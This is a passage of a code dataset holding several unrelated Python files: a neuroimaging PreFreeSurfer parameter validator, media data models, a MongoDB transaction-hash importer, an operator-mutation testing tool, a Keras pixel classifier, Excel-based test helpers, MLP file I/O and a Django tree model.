phase-encoding directions were swapped. \\\n Continuing!\"\n )\n params[\"seunwarpdir\"] = pedirSE1.replace(\"-\", \"\").replace(\"+\", \"\")\n # Else if General Electric Field Map\n elif \"GeneralElectricFieldMap\" in inputs.keys():\n # TODO: how do we handle GE fieldmap? where do we get deltaTE?\n raise Exception(\"Cannot currently handle GeneralElectricFieldmap!\")\n\n params[\"unwarpdir\"] = config[\"StructuralUnwarpDirection\"]\n if \"GradientCoeff\" in inputs.keys():\n params[\"gdcoeffs\"] = context.get_input_path(\"GradientCoeff\")\n\n params[\"printcom\"] = \" \"\n context.gear_dict[\"PRE-params\"] = params\n\n\ndef validate(context):\n \"\"\"\n Ensure that the PreFreeSurfer Parameters are valid.\n Raise Exceptions and exit if not valid.\n \"\"\"\n params = context.gear_dict[\"PRE-params\"]\n inputs = context._invocation[\"inputs\"]\n # Examining Brain Size\n if params[\"brainsize\"] < 10:\n context.log(\"Human Brains have a diameter larger than 1 cm!\")\n context.log(\"Setting to defalut of 150 mm!\")\n params[\"brainsize\"] = 150\n # If \"DwellTime\" is not found in T1w/T2w, skip\n # readout distortion correction\n if (params[\"t1samplespacing\"] == \"NONE\") and (params[\"t2samplespacing\"] == \"NONE\"):\n if params[\"avgrdcmethod\"] != \"NONE\":\n context.log.warning(\n '\"DwellTime\" tag not found. 
'\n + \"Proceeding without readout distortion correction!\"\n )\n params[\"avgrdcmethod\"] = \"NONE\"\n # Examine Siemens Field Map input\n if (\"SiemensGREMagnitude\" in inputs.keys()) and (\n \"SiemensGREPhase\" in inputs.keys()\n ):\n if \"echodiff\" in params.keys():\n if params[\"echodiff\"] == 0:\n raise Exception(\n \"EchoTime1 and EchoTime2 are the same \\\n (Please ensure Magnitude input is TE1)! Exiting.\"\n )\n else:\n raise Exception(\n \"No EchoTime metadata found in FieldMap input file! Exiting.\"\n )\n # Examine TOPUP input\n elif (\"SpinEchoNegative\" in inputs.keys()) and (\n \"SpinEchoPositive\" in inputs.keys()\n ):\n if (\n \"PhaseEncodingDirection\"\n in inputs[\"SpinEchoPositive\"][\"object\"][\"info\"].keys()\n ) and (\n \"PhaseEncodingDirection\"\n in inputs[\"SpinEchoNegative\"][\"object\"][\"info\"].keys()\n ):\n pedirSE1 = inputs[\"SpinEchoPositive\"][\"object\"][\"info\"][\n \"PhaseEncodingDirection\"\n ]\n pedirSE2 = inputs[\"SpinEchoNegative\"][\"object\"][\"info\"][\n \"PhaseEncodingDirection\"\n ]\n pedirSE1 = tr(\"ijk\", \"xyz\", pedirSE1)\n pedirSE2 = tr(\"ijk\", \"xyz\", pedirSE2)\n if pedirSE1 == pedirSE2:\n raise Exception(\n \"SpinEchoPositive and SpinEchoNegative have the same \\\n PhaseEncodingDirection \"\n + str(pedirSE1)\n + \" !\"\n )\n if not (\n ((pedirSE1, pedirSE2) == (\"x\", \"x-\"))\n or ((pedirSE1, pedirSE2) == (\"y\", \"y-\"))\n ) and not (\n ((pedirSE1, pedirSE2) == (\"x-\", \"x\"))\n or ((pedirSE1, pedirSE2) == (\"y-\", \"y\"))\n ):\n raise Exception(\n \"Unrecognized SpinEcho phase-encoding directions \"\n + str(pedirSE1)\n + \", \"\n + str(pedirSE2)\n + \".\"\n )\n else:\n raise Exception(\n \"SpinEchoPositive or SpinEchoNegative input \\\n is missing PhaseEncodingDirection metadata!\"\n )\n elif \"GeneralElectricFieldMap\" in inputs.keys():\n raise Exception(\"Cannot currently handle GeneralElectricFieldmap!\")\n\n\ndef execute(context):\n environ = context.gear_dict[\"environ\"]\n config = context.config\n os.makedirs(context.work_dir + \"/\" + config[\"Subject\"], exist_ok=True)\n command = []\n command.extend(context.gear_dict[\"command_common\"])\n command.append(\n op.join(environ[\"HCPPIPEDIR\"], \"PreFreeSurfer\", \"PreFreeSurferPipeline.sh\")\n )\n command = build_command_list(command, context.gear_dict[\"PRE-params\"])\n\n stdout_msg = (\n \"PreFreeSurfer logs (stdout, stderr) will be available \"\n + 'in the file \"pipeline_logs.zip\" upon completion.'\n )\n\n context.log.info(\"PreFreeSurfer command: \\n\")\n exec_command(context, command, stdout_msg=stdout_msg)\n","sub_path":"utils/args/PreFreeSurfer.py","file_name":"PreFreeSurfer.py","file_ext":"py","file_size_in_byte":10895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
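A worked example of the metadata arithmetic in build() above: DICOM echo times arrive in seconds, echodiff is reported in milliseconds, and both it and the sample spacings are formatted to 15 decimal places. The numbers below are illustrative, not from any real scan.

echotime1 = 0.00492   # magnitude image EchoTime [s] (example value)
echotime2 = 0.00738   # phase image EchoTime [s] (example value)
echodiff = format((echotime2 - echotime1) * 1000.0, ".15f")
print(echodiff)       # ~'2.460000000000000', up to float rounding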
+{"seq_id":"443856755","text":"import os\nfrom PIL import Image\n\nfrom core.envs import IMAGE_DIR, THUMBNAIL_DIR\n\nfrom .parser import (\n parse_carousel,\n parse_comments,\n parse_datetime,\n)\n\n\nclass User:\n def __init__(self, id, username, full_name):\n if isinstance(id, float):\n id = \"\"\n if isinstance(username, float):\n username = \"\"\n if isinstance(full_name, float):\n full_name = \"\"\n\n self.id = id\n self.username = username\n self.full_name = full_name\n\n def __str__(self):\n return f\"User({self.username})\"\n\n\nclass Location:\n def __init__(self, id, name, slug):\n if isinstance(id, float):\n id = \"\"\n if isinstance(name, float):\n name = \"\"\n if isinstance(slug, float):\n slug = \"\"\n\n self.id = id\n self.name = name\n self.slug = slug\n\n def __str__(self):\n return f\"Location({self.name})\"\n\n\nclass Media:\n \"\"\" Abstract class representing Media object \"\"\"\n def __init__(\n self,\n id,\n media_code,\n media_link,\n media_type,\n time,\n likes_count,\n caption,\n comments,\n user,\n location,\n ):\n self.id = id\n self.media_code = media_code\n self.media_link = media_link\n self.media_type = media_type\n self.time = time\n self.likes_count = likes_count\n self.caption = caption\n self.comments = comments\n self.user = user\n self.location = location\n\n def __attr_str__(self):\n return (\n f\"id={self.id},\"\n f\"date={self.time.strftime('%Y-%m-%d')},\"\n f\"likes={self.likes_count},\"\n f\"user={self.user},\"\n f\"loc={self.location}\"\n )\n\n def __str__(self):\n return f\"Media({self.__attr_str__()})\"\n\n\nclass MediaImage(Media):\n \"\"\" Concrete class representing image media \"\"\"\n def __init__(\n self,\n id,\n media_code,\n media_link,\n media_type,\n time,\n likes_count,\n caption,\n comments,\n user,\n location,\n image_url,\n thumbnail_url,\n image=None,\n thumbnail=None,\n ):\n super().__init__(\n id,\n media_code,\n media_link,\n media_type,\n time,\n likes_count,\n caption,\n comments,\n user,\n location,\n )\n self.image_url = image_url\n self.thumbnail_url = thumbnail_url\n self.image = image\n self.thumbnail = thumbnail\n\n def load_image(self, root_dir=\"\"):\n self.image = Image.open(\n os.path.join(root_dir, IMAGE_DIR, f\"{self.id}.jpeg\"))\n return self.image\n\n def load_thumbnail(self, root_dir=\"\"):\n self.thumbnail = Image.open(\n os.path.join(root_dir, THUMBNAIL_DIR, f\"{self.id}.jpeg\"))\n return self.thumbnail\n\n @staticmethod\n def create_from_row(row):\n user = User(\n row['user_id'],\n row['username'],\n row['user_full_name'],\n )\n location = Location(\n row['location_id'],\n row['location_name'],\n row['location_slug'],\n )\n image_url = row['img_highres_url']\n thumbnail_url = row['img_thumbnail_url']\n return MediaImage(\n row['media_id'],\n row['media_code'],\n row['media_link'],\n row['type'],\n parse_datetime(row['created_time']),\n row['likes_count'],\n row['caption'],\n parse_comments(row['comments']),\n user,\n location,\n image_url,\n thumbnail_url,\n )\n\n def __str__(self):\n return f\"MediaImage({self.__attr_str__()})\"\n\n\nclass MediaVideo(Media):\n \"\"\" Concrete class representing video media \"\"\"\n def __init__(\n self,\n id,\n media_code,\n media_link,\n media_type,\n time,\n likes_count,\n caption,\n comments,\n user,\n location,\n video_url,\n thumbnail_url,\n ):\n super().__init__(\n id,\n media_code,\n media_link,\n media_type,\n time,\n likes_count,\n caption,\n comments,\n user,\n location,\n )\n self.video_url = video_url\n self.thumbnail_url = thumbnail_url\n\n def 
load_image(self, root_dir=\"\"):\n image = Image.open(os.path.join(root_dir, IMAGE_DIR, self.id))\n return image\n\n def load_thumbnail(self, root_dir=\"\"):\n thumbnail = Image.open(\n os.path.join(root_dir, THUMBNAIL_DIR, self.id))\n return thumbnail\n\n @staticmethod\n def create_from_row(row):\n video_url = row['img_highres_url']\n thumbnail_url = row['img_thumbnail_url']\n user = User(\n row['user_id'],\n row['username'],\n row['user_full_name'],\n )\n location = Location(\n row['location_id'],\n row['location_name'],\n row['location_slug'],\n )\n return MediaVideo(\n row['media_id'],\n row['media_code'],\n row['media_link'],\n row['type'],\n parse_datetime(row['created_time']),\n row['likes_count'],\n row['caption'],\n parse_comments(row['comments']),\n user,\n location,\n video_url,\n thumbnail_url,\n )\n\n def __str__(self):\n return f\"MediaVideo({self.__attr_str__()})\"\n\n\nclass MediaCarousel(Media):\n \"\"\" Concrete class representing carousel media \"\"\"\n def __init__(\n self,\n id,\n media_code,\n media_link,\n media_type,\n time,\n likes_count,\n caption,\n comments,\n user,\n location,\n medias,\n ):\n super().__init__(\n id,\n media_code,\n media_link,\n media_type,\n time,\n likes_count,\n caption,\n comments,\n user,\n location,\n )\n self.medias = medias\n\n @staticmethod\n def create_from_row(row):\n user = User(\n row['user_id'],\n row['username'],\n row['user_full_name'],\n )\n location = Location(\n row['location_id'],\n row['location_name'],\n row['location_slug'],\n )\n return MediaCarousel(\n row['media_id'],\n row['media_code'],\n row['media_link'],\n row['type'],\n parse_datetime(row['created_time']),\n row['likes_count'],\n row['caption'],\n parse_comments(row['comments']),\n user,\n location,\n parse_carousel(row),\n )\n\n def __str__(self):\n return f\"MediaCarousel({self.__attr_str__()})\"\n","sub_path":"backend/core/db/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
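The isinstance(…, float) guards in User and Location above exist because pandas represents missing CSV cells as float('nan'), so a missing username arrives as a float and is normalized to an empty string. A small demonstration:

user = User(id="42", username=float("nan"), full_name="Ada")
assert user.username == ""      # NaN collapses to an empty string
assert user.full_name == "Ada"  # real strings pass through unchanged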
+{"seq_id":"411621350","text":"\n\ndef delete_duplicate_hosts(self, hosts):\n ' Delete duplicated hosts '\n unique_hosts = []\n listed_hostnames = []\n for zabbix_host in hosts:\n if (zabbix_host['name'] in listed_hostnames):\n continue\n unique_hosts.append(zabbix_host)\n listed_hostnames.append(zabbix_host['name'])\n return unique_hosts\n","sub_path":"Data Set/bug-fixing-2/00efa26cdb7a15bdb049104b3f6330975b17564c--fix.py","file_name":"00efa26cdb7a15bdb049104b3f6330975b17564c--fix.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
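An equivalent, order-preserving formulation of the de-duplication fix above, keyed on the host name (dicts keep insertion order on Python 3.7+); a sketch, not the committed change:

def delete_duplicate_hosts(hosts):
    unique = {}
    for zabbix_host in hosts:
        # keep the first occurrence of each hostname
        unique.setdefault(zabbix_host['name'], zabbix_host)
    return list(unique.values())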
+{"seq_id":"549304613","text":"# this script is used to extract gas price and related waiting time\nimport pandas as pd\nimport re\nimport json\nimport unicodecsv as csv\nimport pymongo\nfrom pymongo.errors import BulkWriteError\n\nDEBUG = True\n\n\n# remove substrings before and after two characters\n# exmaple:\n# input: '12@[123]57'. '[',']'\n# output: '[123]'\ndef remove_redundant_characters(str, char1, char2):\n left_index = str.find(char1)\n right_index = str.find(char2)\n result = str[left_index: (right_index +1)]\n return result\n\n# extract gas and waiting time information from raw data\n# input: str by reading csv files\n# output: json format data\ndef extract_data(str):\n # extract data as string from file\n print(str)\n result = re.search('result:(.*)}', str)\n result = result.group(0) # type: object\n result = remove_redundant_characters(result, '[', ']')\n\n # extract data as json from string\n result = json.loads(result)\n return result\n\n\n# write data into file\ndef write_to_file(file,fieldnames, data):\n with open(file, 'ab')as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames,quoting=csv.QUOTE_ALL)\n writer.writeheader()\n try:\n for item in data:\n assert isinstance(item, object)\n writer.writerow(item)\n except Exception as e :\n print(\"error when writing data to file\")\n print(e.message)\n csvfile.close()\n\ndef check_duplicate():\n db = mongo_client[\"transactions\"]\n col = db[\"processed\"]\n try: \n pipeline = [ \n {'$group': { \n '_id': {'txhash': \"$txhash\"} \n } \n }\n ]\n cursor = col.aggregate(pipeline)\n data = []\n for document in cursor:\n data.append(document['_id']['txhash'])\n \n return(len(data) != len(set(data)))\n\n except Exception as e:\n print('err in check_duplicate')\n \n return False\n#####################################################################\n\n# query mongodb for all pending txs\nmongo_client = pymongo.MongoClient(\"mongodb://localhost:27017/\")\ndb = mongo_client[\"transactions\"]\ncol = db[\"pending\"]\nresults = []\n\nif DEBUG:\n doc = col.find({}).limit(10)\nelse:\n doc = col.find({})\n\n# extract transaction ids from the collections\nfor row in doc:\n arr = json.loads(row['data'])\n if('result' in arr):\n arr_hash = arr['result']\n time = row['time']\n seconds = row['seconds']\n\n for tx_hash in arr_hash:\n item = {\"txhash\": tx_hash, \"time\": time, \"seconds\": seconds }\n results.append(item)\n \n #print(results)\nprint(\"number of items:\")\nprint(len(results))\n\n# store extracted data into mongodb\ndb = mongo_client[\"transactions\"]\ncol = db[\"processed\"]\ncol.create_index([('txhash', pymongo.ASCENDING),('seconds',pymongo.ASCENDING)], unique = True)\n\n\ntry: \n col.insert_many(results, ordered=False)\n\nexcept BulkWriteError as bwe:\n # skip duplicate entries\n print(\"Batch Inserted with some errors. May be some duplicates were found and are skipped.\")\n\nexcept Exception as e:\n print(e.message)\n\ncount = col.count()\nprint(count)\n\n# check if any duplicate entries in the mongodb regarding inserted data\n#print(check_duplicate())\n\n","sub_path":"scripts/save_transactions.py","file_name":"save_transactions.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
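check_duplicate() in the record above materializes every grouped txhash client-side before comparing lengths; comparing the distinct-key count against the document count performs the same check with standard pymongo calls (count_documents also replaces the deprecated count() used above). A sketch against the same collection:

def has_duplicates(col):
    # True if any txhash appears in more than one document
    return len(col.distinct("txhash")) != col.count_documents({})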
+{"seq_id":"564570993","text":"import os\nimport random\nimport copy\nimport re\nimport time\nimport numpy as np\n\nclass Mutation:\n def __init__(self, path):\n self.operator = [\"*\",\"-\",\"+\",\"|\",\"&\",\"<\",\">\",\"^\"]\n self.path= path\n self.original_content = self.open_file()\n self.matrix_of_mutation = np.matrix([[0.7, 0.1, 0.1, 0.02, 0.02, 0.02,0.02,0.02],\n [0.02,0.7,0.08,0.02, 0.02, 0.02, 0.02, 0.02],\n [0.09,0.11,0.7, 0.02, 0.02, 0.02, 0.02, 0.02],\n [0.02, 0.02, 0.02, 0.7, 0.18, 0.02, 0.02, 0.02],\n [0.02, 0.01,0.01,0.2,0.7,0.02,0.02, 0.02],\n [ 0.01, 0.01,0.01,0.01,0.1,0.7,0.24,0.01],\n [0.01,0.01,0.01,0.01,0.02,0.23,0.7,0.1],\n [0.15,0.03,0.02,0.02,0.02,0.02,0.02,0.07]])\n\n self.operators_in_file = {}\n self.combination = list()\n self.maximum = 0\n\n def open_file(self):\n with open(self.path, \"r\") as file:\n content = file.readlines()\n file.close()\n return content\n\n def find_all_operators(self):\n oper_occurs = dict()\n for index, line in enumerate(self.original_content):\n for opt in self.operator:\n if opt in line:\n start, stop = [(m.start(0), m.end(0)) for m in re.finditer(re.escape(opt), line)][0]\n self.operators_in_file[index,start, stop] = opt\n if opt in oper_occurs.keys():\n oper_occurs[opt] +=1\n else:\n oper_occurs[opt] = 1\n self.maximum = max(oper_occurs, key=oper_occurs.get)\n\n\n def combination_of_mut(self):\n for index, line in enumerate(self.operators_in_file):\n original = self.operators_in_file[line]\n for i in range(len(self.operator) - 1):\n mut = self.change_operator(original, i)\n self.combination.append([original, mut, line])\n\n def save_mutate_code(self,folder, file):\n content = copy.deepcopy(self.original_content)\n self.choose_mutation()\n content[self.chosen_oper_index[2][0]] = self.replace_char(content[self.chosen_oper_index[2][0]],self.chosen_oper_index[2][1],\n self.chosen_oper_index[2][2],self.chosen_oper_index[1])\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n name = \"M\" + file\n with open(os.path.join(folder, name), \"w\") as file:\n for line in content:\n file.write(line)\n return content\n\n\n def replace_char(self,text,start, end, replacement):\n return '%s%s%s'%(text[:start],replacement,text[end:])\n\n def change_operator(self,opt,index):\n operators = copy.deepcopy(self.operator)\n operators.remove(opt)\n return operators[index]\n\n def count_propability(self):\n p = list()\n matrix = self.matrix_of_mutation\n propablity = list()\n hightest = self.get_index([self.maximum,self.maximum])\n # if self.mutant == True:\n # matrix = np.transpose(matrix)\n # print(\"poo\",matrix)\n h = matrix[hightest[0], hightest[1]]\n for i in self.combination:\n indexs = self.get_index(i)\n p.append(matrix[indexs[0],indexs[1]]/h)\n for i in p:\n propablity.append(i/sum(np.array(p)))\n self.propablity = np.array(propablity)\n #return np.array(propablity)\n\n def choose_mutation(self):\n self.chosen_oper_index = self.combination[random.choice(list(enumerate(self.propablity)))[0]]\n\n def get_index(self,char):\n return [self.operator.index(char[0]),self.operator.index(char[1])]\n\n\n\n\n\n# m = Mutation ('codes/neww.py')\n# m.find_all_operators()\n#\n# m.combination_of_mut()\n# m.count_propability()\n# m.choose_mutation()\n# m.save_mutate_code(\"mut\",\"neww.py\")\n# prob = m.count_propability(mut,most_occurs)\n# index = m.choose_mutation(prob)\n# m.save_mut_code(contentes[index],\"mut\",\"foo.py\",index)\n\n# d = Mutation(name,True)\n# opt , most_occurs = d.find_all_operators()\n# mut, contentes =d.mut_char(opt)\n# prob = 
d.count_propability(mut,most_occurs)\n# index = d.choose_mutation(prob)\n\n\n\n","sub_path":"new_mutation.py","file_name":"new_mutation.py","file_ext":"py","file_size_in_byte":4389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"279571655","text":"\"\"\"\nПопробуем обучить нейронную сеть распозновать цвет не пинов\nПолучать на вход при обучении цвета и маркер к ним\nДАнные\nЦвет (b,g,r) - маркер\nМаркеры - Цвет пина, цвет не пина\nВыход\nЭтот цвет есть ецет пина - 1, этот цвет цвет не пина - 0\n\"\"\"\n\nimport cv2\nfrom pathlib import Path\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport json\nimport copy\nfrom SegmentationAlgorithms.Tools.Tools import generate_dataset_from_supervisely\nimport tensorflow as tf\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Dense, Flatten, Activation, BatchNormalization\n\n\ndef create_network(learning_rate=0.03):\n\t\"\"\"\n\tПоэкспериментируетм с разбиением цветов пинов и не пинов\n\t:return:\n\t\"\"\"\n\n\tx = tf.placeholder(dtype=tf.float32, shape=[3], name='pixels')\n\ty = tf.placeholder(dtype=tf.uint8, shape=[None, 1], name='desired_out')\n\n\tx_norm = tf.div(x, 255.0)\n\ty_one_hot = tf.one_hot(y, depth=2)\n\n\thidden_1 = tf.layers.dense(inputs=x_norm, units=3, name='hidden_one', activation=tf.nn.leaky_relu)\n\tnet_out = tf.layers.dense(inputs=hidden_1, units=2, name='net_out', activation=None)\n\n\tnet_out_squeezed = tf.squeeze(net_out)\n\n\tloss = tf.losses.softmax_cross_entropy(onehot_labels=y_one_hot, logits=net_out_squeezed)\n\ttrain_step = tf.train.AdadeltaOptimizer(learning_rate).minimize(loss)\n\taccuracy = tf.metrics.accuracy(labels=y_one_hot, predictions=net_out_squeezed, name='accuracy')\n\t# accuracy_metric = tf.summary.scalar(name='accuracy_summary', tensor=accuracy)\n\n\treturn {'x': x, 'y': y, 'train_step': train_step, 'accuracy': accuracy}\n\ndef create_network_keras():\n\tmodel = Sequential([\n\t\tFlatten(input_shape=(3,), name='F1'),\n\t\tDense(units=10, activation=tf.keras.activations.relu, name='D1'),\n\t\tBatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True,\n\t\t beta_initializer='zeros', gamma_initializer='ones',\n\t\t moving_mean_initializer='zeros', moving_variance_initializer='ones',\n\t\t beta_regularizer=None, gamma_regularizer=None, beta_constraint=None,\n\t\t gamma_constraint=None),\n\t\tDense(units=10, activation=tf.keras.activations.relu, name='D11'),\n\t\tBatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True,\n\t\t beta_initializer='zeros', gamma_initializer='ones',\n\t\t moving_mean_initializer='zeros', moving_variance_initializer='ones',\n\t\t beta_regularizer=None, gamma_regularizer=None, beta_constraint=None,\n\t\t gamma_constraint=None),\n\t\tDense(units=2, name='D2'),\n\t\tActivation(activation=tf.keras.activations.softmax, name='OUT')\n\t])\n\n\tmodel.compile(\n\t\toptimizer=tf.train.AdadeltaOptimizer(0.003),\n\t\tloss='binary_crossentropy',\n\t\tmetrics=['accuracy'])\n\n\treturn model\n\ndef train():\n\tpass\n\n\nmodel = None\nimage = None\n\n\ndef onMouse(event,x,y,flags,param):\n\tif event == cv2.EVENT_LBUTTONDOWN:\n\t\tpixel = np.array([image[y, x]])\n\t\t# print(type(pixel), pixel.shape)\n\t\tprint('pixel is', pixel)\n\t\tpred = model.predict(pixel)\n\t\tpin = False if pred[0][0] > pred[0][1] else True\n\t\tprint(pred)\n\t\tprint('Это пин', pin)\n\n\nif __name__ == '__main__':\n\tglobal model\n\tmodel = create_network_keras()\n\n\tmodel.summary()\n\n\tpins = np.load('dataset/pins.npy')\n\tpin_labels = np.ones(shape=(pins.shape[0], 1))\n\tnot_pins = np.load('dataset/not_pins.npy')\n\tnot_pin_labels = np.zeros(shape=(not_pins.shape[0], 1))\n\n\tx = np.vstack((pins, not_pins))\n\tlabels = np.vstack((pin_labels, 
not_pin_labels))\n\tx_norm = x / 255.0\n\tdel x\n\n\tmodel.fit(x_norm, labels, epochs=1, batch_size=512, validation_split=0.3)\n\n\n#\n#\n\n\n\n\n","sub_path":"SegmentationAlgorithms/BGPecker.py","file_name":"BGPecker.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"145831136","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019-04-03 17:10\n# @Author : yangzhen\n# @Site : \n# @File : get_data.py\n# @Software: PyCharm\n#获取Excel数据\n\nfrom util.operation_excel import OperationExcel\nimport data_config\nfrom util.operation_json import OperationJson\n\nclass GetData:\n def __init__(self):\n self.opera_excel = OperationExcel()\n\n #去获取Excel行数,就是case的个数\n def get_case_lines(self):\n self.opera_excel.get_lines()\n\n\n #获取是否执行\n def get_is_run(self,row):\n flag = None\n col = int(data_config.get_run())\n run_model = self.opera_excel.get_cell_value(row,col)\n\n\n #是否携带header\n def is_header(self,row):\n col = int(data_config.get_header())\n header = self.opera_excel.get_cell_value(row,col)\n if header == 'yes':\n return data_config.get_data_value()\n else:\n return None\n\n #获取请求方式\n def get_request_method(self,row):\n col = int(data_config.get_run_way())\n request_method = self.opera_excel.get_cell_value(row,col)\n return request_method\n\n #获取URL\n def get_request_url(self,row):\n col = int(data_config.get_url())\n request_url = self.opera_excel.get_cell_value(row,col)\n return request_url\n\n #获取请求数据\n def get_request_data(self,row):\n col = int(data_config.get_data())\n data = self.opera_excel.get_cell_value(row,col)\n if data == '':\n return None\n return data\n\n #通过获取关键字拿到data\n def get_data_for_json(self,row):\n opera_json = OperationJson()\n request_data = opera_json.get_data(self.get_request_data(row))\n return request_data\n\n #获取预期结果\n def get_expect_data(self,row):\n col = int(data_config.get_expect())\n expect = self.opera_excel.get_cell_value(row,col)\n if expect == '':\n return None\n\n return expect\n\n #写入实际结果\n def write_result(self,row,value):\n col = int(data_config.get_result())\n self.opera_excel.write_value(row,col,value)\n\n #获取依赖数据的key\n def get_dependent_key(self,row):\n col = int(data_config.get_data_depend())\n depent_key = self.opera_excel.get_cell_value(row,col)\n if depent_key == \"\":\n return None\n else:\n return depent_key\n\n\n #判断是否有case依赖\n def is_depend(self,row):\n col = int(data_config.get_field_depend())\n depend_case_id = self.opera_excel.get_cell_value(row,col)\n if depend_case_id == \"\":\n return None\n else:\n return depend_case_id\n\n #获取数据依赖字段\n def get_depend_field(self,row):\n col = int(data_config.get_field_depend())\n data = self.opera_excel.get_cell_value(row,col)\n if data == \"\":\n return None\n else:\n return data\n","sub_path":"data/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"113686771","text":"import numpy as np\nimport MLP\n\n\"\"\"\nReads and writes MLP-related data from and to files.\n\"\"\" \n\ndataPath = \"../../data/Python\"\n\ninputFilePath = dataPath + \"/input.txt\"\nlabelsFilePath = dataPath + \"/labels.txt\"\noutputFilePath = dataPath + \"/network.txt\"\n\nplotOutputFilePath = dataPath + \"/plotData.txt\"\n\ndef readInputs(): \n return np.loadtxt(inputFilePath, dtype=float, delimiter=\",\")\n\ndef readLabels(): \n return np.loadtxt(labelsFilePath, dtype=float, delimiter=\",\")\n\ndef writeModel(weights, biases, transferFunctions):\n fileWriter = open(outputFilePath, 'w')\n fileWriter.truncate()\n \n fileWriter.write(\"--------------------------------------------------------\\n\\n\")\n for layer in range(0, len(weights)):\n fileWriter.write(\"Layer \" + str(layer + 1) + \"\\n\");\n fileWriter.write(\"\\n Weights:\\n\" + str(weights[layer]) + \"\\n\")\n fileWriter.write(\"\\n Biases:\\n\" + str(biases[layer]) + \"\\n\")\n fileWriter.write(\"\\n Transfer Function:\\n\" + \" \" + \n MLP.getTransferFunctionAsString(transferFunctions[layer]) + \"\\n\")\n fileWriter.write(\"\\n--------------------------------------------------------\\n\\n\")\n \n fileWriter.close()\n \n\"\"\" \nFor one-dimensional data only.\n\"\"\"\ndef writePlotData(mlp, lower, upper, step):\n fileWriter = open(plotOutputFilePath, 'w')\n fileWriter.truncate()\n \n firstLine = True\n for x in np.arange(lower, upper + step/2, step):\n if (firstLine == False):\n fileWriter.write(\"\\n\")\n y = np.asarray(np.asarray(mlp.predict(x))[0])[0]\n fileWriter.write(str(x) + \",\" + str(y) + \",\")\n firstLine = False\n \n fileWriter.close()\n\ndef setFilePaths(inputFilePath, labelsFilePath, outputFilePath): \n self.inputFilePath = inputFilePath\n self.labelFilePath = labelsFilePath\n self.outputFilePath = outputFilePath\n","sub_path":"RNN/src/pythonMLP/MLPData.py","file_name":"MLPData.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"553169014","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom tree_models.functions import Replace\n\n\nclass AbstractTree(models.Model):\n class Meta:\n abstract = True\n ordering = ['-path']\n\n def save(self, *args, **kwargs):\n if self.pk is None:\n self.create()\n else:\n self.update()\n\n def create(self):\n super(AbstractTree, self).save(force_insert=True)\n\n if self.parent:\n self.depth = self.parent.depth + 1\n self.path = \"{0}{1}/\".format(self.parent.path, self.id)\n else:\n self.path = \"_{}/\".format(self.id)\n\n super(AbstractTree, self).save(force_update=True)\n\n def update(self):\n depth = self.depth\n path = self.path\n\n if self.parent:\n #if self.depth < self.parent.depth:\n # depth = self.parent.depth\n # path = self.parent.path\n #else:\n # depth = self.depth\n # path = self.path\n\n self.depth = self.parent.depth + 1\n self.path = \"{0}{1}/\".format(self.parent.path, self.id)\n else:\n # depth = self.depth\n # path = self.path\n\n self.depth = 0\n self.path = \"_{}/\".format(self.id)\n\n self.update_childs(depth, path)\n\n super(AbstractTree, self).save(force_update=True)\n\n def update_childs(self, depth, path):\n result = None\n queryset = self._default_manager.filter(path__startswith=path)\n\n count = queryset.count()\n if count:\n kwargs = {'path': Replace('path', path, self.path)}\n\n if self.depth < depth:\n depth_diff = depth - self.depth\n kwargs['depth'] = models.F('depth') - depth_diff\n elif self.depth > depth:\n depth_diff = self.depth - depth\n kwargs['depth'] = models.F('depth') + depth_diff\n\n result = queryset.update(**kwargs)\n return result\n\n def delete(self, *args, **kwargs):\n self.delete_childs()\n super(AbstractTree, self).delete(*args, **kwargs)\n\n def delete_childs(self):\n result = None\n queryset = self._default_manager.filter(path__startswith=self.path)\n\n count = queryset.count()\n if count:\n result = queryset.delete()\n return result\n\n\nclass Tree(AbstractTree):\n parent = models.ForeignKey(\n 'self',\n verbose_name=_('Parent'),\n blank=True,\n null=True\n )\n path = models.TextField(_('Path'), editable=False)\n depth = models.PositiveIntegerField(_('Depth'), default=0, editable=False)\n","sub_path":"tree_models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
